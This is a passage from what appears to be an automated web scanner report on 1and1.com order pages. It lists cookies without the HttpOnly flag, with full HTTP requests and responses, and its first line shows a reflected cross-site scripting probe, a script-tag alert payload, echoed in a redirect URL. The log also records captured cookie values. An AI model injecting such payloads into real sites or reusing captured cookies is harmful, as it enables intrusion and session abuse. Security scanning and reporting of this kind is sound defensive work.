Location: http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e;jsessionid=017875AF4FDBD39645191C205A94077D.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail
Content-Length: 0
Content-Type: text/plain


5.130. http://order.1and1.com/xml/order/Mshosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mshosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Mshosting HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=3c94c49b88c62400; UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0jKVliKBszLy4zMC0wMSstKCk=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:12:AAABLtRYsR8sOtfROdrX6nNd8dbBxzhJ:1300642705695; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:39:32 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=56a1c9b59ccfc800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Mshosting;jsessionid=01D155683593BC8236955C8C848B8849.TCpfix142a
Content-Length: 0
Content-Type: text/plain


5.131. http://order.1and1.com/xml/order/News  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/News HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:38:14 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1077e08166155000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/News;jsessionid=41B0847EFB4C20EDB1DB4A5689CF983B.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.132. http://order.1and1.com/xml/order/News  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:15 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=AZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:52:22 GMT; Path=/
ETag: edde5942d29d19678a705797aa76065e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28632


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.133. http://order.1and1.com/xml/order/PrivacyPolicy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/PrivacyPolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:36:30 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3cad72d7db6a8800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/PrivacyPolicy;jsessionid=1B10F35FFB9A21D430ADF28D0838D7F0.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.134. http://order.1and1.com/xml/order/PrivacyPolicy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.privacypolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:36:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=idGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:50:43 GMT; Path=/
ETag: 3dd7dc19c0118095f7d091fc8a56e2d8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24721


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.135. http://order.1and1.com/xml/order/Server  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=66655d0aa462b000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Server;jsessionid=78C6B87E5A15AD5EF5A69765C4874290.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.136. http://order.1and1.com/xml/order/Server  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.137. http://order.1and1.com/xml/order/ServerPremium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 4ad2d8e7cdb21186fe994e75ac91e0f5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 32407


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.138. http://order.1and1.com/xml/order/ServerPremium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/ServerPremium HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=c9c91afabf3b400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/ServerPremium;jsessionid=734354D933F26155728283B4F90796F3.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.139. http://order.1and1.com/xml/order/Service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:34 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:51:41 GMT; Path=/
ETag: 061f57075175d32d050436bb2f2cadd9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18433


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.140. http://order.1and1.com/xml/order/Service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Service HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:27 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=39e0d7fe6aed5c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Service;jsessionid=F66505FF61FF7A0A0A2DEA57081E282A.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.141. http://order.1and1.com/xml/order/Sharepoint  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:25 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=581fa44293975c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Sharepoint;jsessionid=ADA7E1BA4729C77C2B7C450364513DA5.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.142. http://order.1and1.com/xml/order/Sharepoint  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
